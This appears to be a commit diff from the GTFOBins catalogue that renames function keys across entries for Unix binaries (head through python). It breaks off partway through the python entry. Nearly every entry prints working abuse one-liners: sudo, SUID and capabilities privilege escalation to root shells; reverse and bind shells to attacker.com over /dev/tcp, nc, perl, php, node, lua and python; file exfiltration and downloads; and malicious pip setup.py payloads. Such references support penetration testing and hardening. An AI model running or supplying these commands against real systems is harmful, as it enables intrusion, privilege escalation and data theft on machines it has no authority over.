sudo grep '' $LFILE sudo grep '' $LFILE

4
_gtfobins/head.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
head -c1G "$LFILE" head -c1G "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./head -c1G "$LFILE" ./head -c1G "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo head -c1G "$LFILE" sudo head -c1G "$LFILE"

6
_gtfobins/ionice.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ionice /bin/sh - code: ionice /bin/sh
suid-enabled: suid:
- code: ./ionice /bin/sh -p - code: ./ionice /bin/sh -p
sudo-enabled: sudo:
- code: sudo ionice /bin/sh - code: sudo ionice /bin/sh
--- ---

4
_gtfobins/journalctl.md
View File

@ -4,11 +4,11 @@ description: |
This might not work if run by unprivileged users depending on the system configuration. This might not work if run by unprivileged users depending on the system configuration.
functions: functions:
execute-interactive: shell:
- code: | - code: |
journalctl journalctl
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- code: | - code: |
sudo journalctl sudo journalctl
!/bin/sh !/bin/sh

4
_gtfobins/jq.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
jq -Rr . "$LFILE" jq -Rr . "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./jq -Rr . "$LFILE" ./jq -Rr . "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo jq -Rr . "$LFILE" sudo jq -Rr . "$LFILE"

12
_gtfobins/ksh.md
View File

@ -1,14 +1,14 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ksh - code: ksh
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
upload: file-upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -21,7 +21,7 @@ functions:
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -49,8 +49,8 @@ functions:
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
suid-enabled: suid:
- code: ./ksh -p - code: ./ksh -p
sudo-enabled: sudo:
- code: sudo ksh - code: sudo ksh
--- ---

6
_gtfobins/ld.so.md
View File

@ -7,10 +7,10 @@ description: |
/lib64/ld-linux-x86-64.so.2 /lib64/ld-linux-x86-64.so.2
``` ```
functions: functions:
execute-interactive: shell:
- code: /lib/ld.so /bin/sh - code: /lib/ld.so /bin/sh
suid-enabled: suid:
- code: ./ld.so /bin/sh -p - code: ./ld.so /bin/sh -p
sudo-enabled: sudo:
- code: sudo /lib/ld.so /bin/sh - code: sudo /lib/ld.so /bin/sh
--- ---

6
_gtfobins/less.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
less /etc/profile less /etc/profile
!/bin/sh !/bin/sh
@ -14,10 +14,10 @@ functions:
echo DATA | less echo DATA | less
sfile_to_write sfile_to_write
q q
sudo-enabled: sudo:
- code: | - code: |
sudo less /etc/profile sudo less /etc/profile
!/bin/sh !/bin/sh
suid-enabled: suid:
- code: ./less file_to_read - code: ./less file_to_read
--- ---

4
_gtfobins/ltrace.md
View File

@ -1,7 +1,7 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ltrace -b -L /bin/sh - code: ltrace -b -L /bin/sh
sudo-enabled: sudo:
- code: sudo ltrace -b -L /bin/sh - code: sudo ltrace -b -L /bin/sh
--- ---

14
_gtfobins/lua.md
View File

@ -1,8 +1,8 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: lua -e 'os.execute("/bin/sh")' - code: lua -e 'os.execute("/bin/sh")'
reverse-shell-non-interactive: non-interactive-reverse-shell:
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed. - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -15,7 +15,7 @@ functions:
local b=assert(f:read("*a"));t:send(b); local b=assert(f:read("*a"));t:send(b);
end; end;
f:close();t:close();' f:close();t:close();'
bind-shell-non-interactive: non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed. - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed.
code: | code: |
export LPORT=12345 export LPORT=12345
@ -26,7 +26,7 @@ functions:
local r,x=c:receive();local f=assert(io.popen(r,"r")); local r,x=c:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));c:send(b); local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();' end;c:close();f:close();'
upload: file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed. - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
@ -41,7 +41,7 @@ functions:
t:connect(os.getenv("RHOST"),os.getenv("RPORT")); t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d); t:send(d);
t:close();' t:close();'
download: file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed. < "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed.
code: | code: |
@ -59,8 +59,8 @@ functions:
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);' - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
file-read: file-read:
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
sudo-enabled: sudo:
- code: sudo lua -e 'os.execute("/bin/sh")' - code: sudo lua -e 'os.execute("/bin/sh")'
suid-limited: limited-suid:
- code: ./lua -e 'os.execute("/bin/sh")' - code: ./lua -e 'os.execute("/bin/sh")'
--- ---

4
_gtfobins/mail.md
View File

@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: This creates a valid Mbox file which may be required by the binary. - description: This creates a valid Mbox file which may be required by the binary.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF echo "From nobody@localhost $(date)" > $TF
mail -f $TF mail -f $TF
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- description: This creates a valid Mbox file which may be required by the binary. - description: This creates a valid Mbox file which may be required by the binary.
code: | code: |
TF=$(mktemp) TF=$(mktemp)

6
_gtfobins/make.md
View File

@ -1,7 +1,7 @@
--- ---
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`. description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
functions: functions:
execute-interactive: shell:
- code: | - code: |
COMMAND='/bin/sh' COMMAND='/bin/sh'
make -s --eval=$'x:\n\t-'"$COMMAND" make -s --eval=$'x:\n\t-'"$COMMAND"
@ -10,11 +10,11 @@ functions:
code: | code: |
LFILE=file_to_write LFILE=file_to_write
make -s --eval="\$(file >$LFILE,DATA)" . make -s --eval="\$(file >$LFILE,DATA)" .
suid-enabled: suid:
- code: | - code: |
COMMAND='/bin/sh -p' COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND" ./make -s --eval=$'x:\n\t-'"$COMMAND"
sudo-enabled: sudo:
- code: | - code: |
COMMAND='/bin/sh' COMMAND='/bin/sh'
sudo make -s --eval=$'x:\n\t-'"$COMMAND" sudo make -s --eval=$'x:\n\t-'"$COMMAND"

6
_gtfobins/man.md
View File

@ -1,16 +1,16 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
man man man man
!/bin/sh !/bin/sh
file-read: file-read:
- code: man file_to_read - code: man file_to_read
sudo-enabled: sudo:
- code: | - code: |
sudo man man sudo man man
!/bin/sh !/bin/sh
suid-limited: limited-suid:
- code: | - code: |
./man man ./man man
!/bin/sh !/bin/sh

6
_gtfobins/more.md
View File

@ -1,14 +1,14 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TERM= more /etc/profile TERM= more /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:
- code: more file_to_read - code: more file_to_read
suid-enabled: suid:
- code: ./more file_to_read - code: ./more file_to_read
sudo-enabled: sudo:
- code: | - code: |
TERM= sudo -E more /etc/profile TERM= sudo -E more /etc/profile
!/bin/sh !/bin/sh

2
_gtfobins/mount.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
sudo-enabled: sudo:
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
code: | code: |
sudo mount -o bind /bin/sh /bin/mount sudo mount -o bind /bin/sh /bin/mount

4
_gtfobins/mv.md
View File

@ -1,13 +1,13 @@
--- ---
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges. description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
functions: functions:
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)
echo "DATA" > $TF echo "DATA" > $TF
./mv $TF $LFILE ./mv $TF $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)

6
_gtfobins/mysql.md
View File

@ -1,10 +1,10 @@
--- ---
description: A valid MySQL server must be available. description: A valid MySQL server must be available.
functions: functions:
execute-interactive: shell:
- code: mysql -e '\! /bin/sh' - code: mysql -e '\! /bin/sh'
sudo-enabled: sudo:
- code: sudo mysql -e '\! /bin/sh' - code: sudo mysql -e '\! /bin/sh'
suid-limited: limited-suid:
- code: ./mysql -e '\! /bin/sh' - code: ./mysql -e '\! /bin/sh'
--- ---

6
_gtfobins/nano.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh' > $TF echo 'exec sh' > $TF
@ -14,14 +14,14 @@ functions:
^O ^O
file-read: file-read:
- code: nano file_to_read - code: nano file_to_read
suid-enabled: suid:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh -p' > $TF echo 'exec sh -p' > $TF
chmod +x $TF chmod +x $TF
./nano -s $TF /etc/hosts ./nano -s $TF /etc/hosts
^T ^T
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh' > $TF echo 'exec sh' > $TF

12
_gtfobins/nc.md
View File

@ -1,36 +1,36 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
nc -e /bin/sh $RHOST $RPORT nc -e /bin/sh $RHOST $RPORT
bind-shell-interactive: bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional. - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
code: | code: |
LPORT=12345 LPORT=12345
nc -l -p $LPORT -e /bin/sh nc -l -p $LPORT -e /bin/sh
upload: file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE" nc $RHOST $RPORT < "$LFILE"
download: file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
code: | code: |
LPORT=12345 LPORT=12345
LFILE=file_to_save LFILE=file_to_save
nc -l -p $LPORT > "$LFILE" nc -l -p $LPORT > "$LFILE"
sudo-enabled: sudo:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
sudo nc -e /bin/sh $RHOST $RPORT sudo nc -e /bin/sh $RHOST $RPORT
suid-limited: limited-suid:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

6
_gtfobins/nice.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: nice /bin/sh - code: nice /bin/sh
suid-enabled: suid:
- code: ./nice /bin/sh -p - code: ./nice /bin/sh -p
sudo-enabled: sudo:
- code: sudo nice /bin/sh - code: sudo nice /bin/sh
--- ---

4
_gtfobins/nl.md
View File

@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
nl -bn -w1 -s '' $LFILE nl -bn -w1 -s '' $LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./nl -bn -w1 -s '' $LFILE ./nl -bn -w1 -s '' $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo nl -bn -w1 -s '' $LFILE sudo nl -bn -w1 -s '' $LFILE

14
_gtfobins/nmap.md
View File

@ -1,12 +1,12 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: Input echo is disabled. - description: Input echo is disabled.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF nmap --script=$TF
reverse-shell-non-interactive: non-interactive-reverse-shell:
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -21,7 +21,7 @@ functions:
end; end;
f:close();t:close();' > $TF f:close();t:close();' > $TF
nmap --script=$TF nmap --script=$TF
bind-shell-non-interactive: non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
export LPORT=12345 export LPORT=12345
@ -34,7 +34,7 @@ functions:
local b=assert(f:read("*a"));c:send(b); local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();' > $TF end;c:close();f:close();' > $TF
nmap --script=$TF nmap --script=$TF
upload: file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -50,7 +50,7 @@ functions:
t:send(d); t:send(d);
t:close();' > $TF t:close();' > $TF
nmap --script=$TF nmap --script=$TF
download: file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file. < "file_to_send"` on the attacker box to send the file.
code: | code: |
@ -76,13 +76,13 @@ functions:
TF=$(mktemp) TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
nmap --script=$TF nmap --script=$TF
sudo-enabled: sudo:
- description: Input echo is disabled. - description: Input echo is disabled.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF sudo nmap --script=$TF
suid-limited: limited-suid:
- description: Input echo is disabled. - description: Input echo is disabled.
code: | code: |
TF=$(mktemp) TF=$(mktemp)

12
_gtfobins/node.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -14,7 +14,7 @@ functions:
sh.stdout.pipe(this); sh.stdout.pipe(this);
sh.stderr.pipe(this); sh.stderr.pipe(this);
});' });'
bind-shell-interactive: bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
export LPORT=12345 export LPORT=12345
@ -24,13 +24,13 @@ functions:
sh.stdout.pipe(client); sh.stdout.pipe(client);
sh.stderr.pipe(client); sh.stderr.pipe(client);
}).listen(process.env.LPORT);' }).listen(process.env.LPORT);'
suid-enabled: suid:
- code: | - code: |
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});' ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
sudo-enabled: sudo:
- code: | - code: |
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
capabilities-enabled: capabilities:
- code: | - code: |
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
--- ---

4
_gtfobins/od.md
View File

@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
od -An -c -w9999 "$LFILE" od -An -c -w9999 "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./od -An -c -w9999 "$LFILE" ./od -An -c -w9999 "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo od -An -c -w9999 "$LFILE" sudo od -An -c -w9999 "$LFILE"

10
_gtfobins/perl.md
View File

@ -1,17 +1,17 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: perl -e 'exec "/bin/sh";' - code: perl -e 'exec "/bin/sh";'
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
suid-enabled: suid:
- code: ./perl -e 'exec "/bin/sh";' - code: ./perl -e 'exec "/bin/sh";'
sudo-enabled: sudo:
- code: sudo perl -e 'exec "/bin/sh";' - code: sudo perl -e 'exec "/bin/sh";'
capabilities-enabled: capabilities:
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' - code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
--- ---

6
_gtfobins/pg.md
View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
pg /etc/profile pg /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:
- code: pg file_to_read - code: pg file_to_read
sudo-enabled: sudo:
- code: | - code: |
sudo pg /etc/profile sudo pg /etc/profile
!/bin/sh !/bin/sh
suid-enabled: suid:
- code: ./pg file_to_read - code: ./pg file_to_read
--- ---

16
_gtfobins/php.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r 'system(getenv("CMD"));' php -r 'system(getenv("CMD"));'
@ -16,37 +16,37 @@ functions:
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
execute-non-interactive: command:
- code: | - code: |
export CMD="id" export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
upload: file-upload:
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later. - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
code: | code: |
LHOST=0.0.0.0 LHOST=0.0.0.0
LPORT=8888 LPORT=8888
php -S $LHOST:$LPORT php -S $LHOST:$LPORT
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
suid-enabled: suid:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
./php -r "system('$CMD');" ./php -r "system('$CMD');"
sudo-enabled: sudo:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
sudo php -r "system('$CMD');" sudo php -r "system('$CMD');"
capabilities-enabled: capabilities:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
./php -r "posix_setuid(0); system('$CMD');" ./php -r "posix_setuid(0); system('$CMD');"

6
_gtfobins/pico.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh' > $TF echo 'exec sh' > $TF
@ -14,14 +14,14 @@ functions:
^O ^O
file-read: file-read:
- code: pico file_to_read - code: pico file_to_read
suid-enabled: suid:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh -p' > $TF echo 'exec sh -p' > $TF
chmod +x $TF chmod +x $TF
./pico -s $TF /etc/hosts ./pico -s $TF /etc/hosts
^T ^T
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh' > $TF echo 'exec sh' > $TF

12
_gtfobins/pip.md
View File

@ -1,11 +1,11 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
pip install $TF pip install $TF
reverse-shell-interactive: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -16,7 +16,7 @@ functions:
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py pty.spawn("/bin/sh")' > $TF/setup.py
pip install $TF pip install $TF
upload: file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
@ -36,7 +36,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
pip install $TF pip install $TF
download: file-download:
- description: Fetch a remote file via HTTP GET request. It needs an absolute local file path. - description: Fetch a remote file via HTTP GET request. It needs an absolute local file path.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
@ -60,12 +60,12 @@ functions:
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py
pip install $TF pip install $TF
load-library: library-load:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
pip install $TF pip install $TF
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

4
_gtfobins/puppet.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
file-write: file-write:
@ -13,7 +13,7 @@ functions:
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE puppet filebucket -l diff /dev/null $LFILE
sudo-enabled: sudo:
- code: | - code: |
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
--- ---

16
_gtfobins/python.md
View File

@ -1,9 +1,9 @@
--- ---
description: The payloads are compatible with both Python version 2 and 3. description: The payloads are compatible with both Python version 2 and 3.
functions: functions:
execute-interactive: shell:
- code: python -c 'import os; os.system("/bin/sh")' - code: python -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -12,7 +12,7 @@ functions:
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
